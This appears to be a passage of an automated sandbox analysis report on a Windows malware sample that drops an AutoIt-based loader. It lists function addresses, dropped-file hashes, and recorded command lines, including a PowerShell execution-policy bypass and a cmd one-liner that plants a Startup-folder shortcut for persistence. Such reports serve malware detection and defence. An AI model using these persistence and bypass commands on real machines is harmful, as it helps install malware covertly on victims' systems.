Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB161840 0_2_00007FF6BB161840
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D87C 0_2_00007FF6BB19D87C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1358D0 0_2_00007FF6BB1358D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14F8D0 0_2_00007FF6BB14F8D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB151750 0_2_00007FF6BB151750
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1D17C0 0_2_00007FF6BB1D17C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B56A0 0_2_00007FF6BB1B56A0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1595B0 0_2_00007FF6BB1595B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162D20 0_2_00007FF6BB162D20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B6C34 0_2_00007FF6BB1B6C34
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB122AE0 0_2_00007FF6BB122AE0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1C0AEC 0_2_00007FF6BB1C0AEC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1530DC 0_2_00007FF6BB1530DC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB130E70 0_2_00007FF6BB130E70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB140E90 0_2_00007FF6BB140E90
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CCE8C 0_2_00007FF6BB1CCE8C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB166DE4 0_2_00007FF6BB166DE4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1584C0 0_2_00007FF6BB1584C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB144514 0_2_00007FF6BB144514
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B8360 0_2_00007FF6BB1B8360
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A83D4 0_2_00007FF6BB1A83D4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14C3FC 0_2_00007FF6BB14C3FC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162400 0_2_00007FF6BB162400
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1402C4 0_2_00007FF6BB1402C4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B6320 0_2_00007FF6BB1B6320
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15A8A0 0_2_00007FF6BB15A8A0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1667F0 0_2_00007FF6BB1667F0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CC6D4 0_2_00007FF6BB1CC6D4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1C055C 0_2_00007FF6BB1C055C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CA59C 0_2_00007FF6BB1CA59C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E211D 1_2_00007FFD9B7E211D
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0053B020 3_2_0053B020
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005394E0 3_2_005394E0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00539C80 3_2_00539C80
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005523F5 3_2_005523F5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005B8400 3_2_005B8400
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00566502 3_2_00566502
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0056265E 3_2_0056265E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0053E6F0 3_2_0053E6F0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055282A 3_2_0055282A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005689BF 3_2_005689BF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00566A74 3_2_00566A74
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005B0A3A 3_2_005B0A3A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00540BE0 3_2_00540BE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055CD51 3_2_0055CD51
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0058EDB2 3_2_0058EDB2
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00598E44 3_2_00598E44
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005B0EB7 3_2_005B0EB7
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00566FE6 3_2_00566FE6
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005533B7 3_2_005533B7
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0054D45D 3_2_0054D45D
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055F409 3_2_0055F409
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00531663 3_2_00531663
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0054F628 3_2_0054F628
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005516B4 3_2_005516B4
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0053F6A0 3_2_0053F6A0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005578C3 3_2_005578C3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055DBA5 3_2_0055DBA5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00551BA8 3_2_00551BA8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00569CE5 3_2_00569CE5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0054DD28 3_2_0054DD28
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055BFD6 3_2_0055BFD6
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00551FC0 3_2_00551FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008AB020 10_2_008AB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008A94E0 10_2_008A94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008A9C80 10_2_008A9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C23F5 10_2_008C23F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00928400 10_2_00928400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D6502 10_2_008D6502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008AE6F0 10_2_008AE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D265E 10_2_008D265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C282A 10_2_008C282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D89BF 10_2_008D89BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00920A3A 10_2_00920A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D6A74 10_2_008D6A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008B0BE0 10_2_008B0BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008FEDB2 10_2_008FEDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CCD51 10_2_008CCD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00920EB7 10_2_00920EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00908E44 10_2_00908E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D6FE6 10_2_008D6FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C33B7 10_2_008C33B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CF409 10_2_008CF409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008BD45D 10_2_008BD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008AF6A0 10_2_008AF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C16B4 10_2_008C16B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008BF628 10_2_008BF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008A1663 10_2_008A1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C78C3 10_2_008C78C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C1BA8 10_2_008C1BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CDBA5 10_2_008CDBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008D9CE5 10_2_008D9CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008BDD28 10_2_008BDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C1FC0 10_2_008C1FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CBFD6 10_2_008CBFD6
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008B1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008C0D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008C8B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00550D17 appears 70 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00558B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00541A36 appears 34 times
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: String function: 00007FF6BB148D58 appears 76 times
Sample file is different than original file name gathered from version info
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: classification engine Classification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A3778 GetLastError,FormatMessageW, 0_2_00007FF6BB1A3778
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00007FF6BB18D5CC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18CCE0 AdjustTokenPrivileges,CloseHandle, 0_2_00007FF6BB18CCE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00588DE9 AdjustTokenPrivileges,CloseHandle, 3_2_00588DE9
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00589399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 3_2_00589399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008F8DE9 AdjustTokenPrivileges,CloseHandle, 10_2_008F8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_008F9399
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_00007FF6BB1A59D8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF6BB19BE00
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B7E38 CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_00007FF6BB1B7E38
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB126580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00007FF6BB126580
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mibvk1qm.s2r.ps1 Jump to behavior
Source: T6l6gPxwQU.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: T6l6gPxwQU.exe ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\T6l6gPxwQU.exe "C:\Users\user\Desktop\T6l6gPxwQU.exe"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
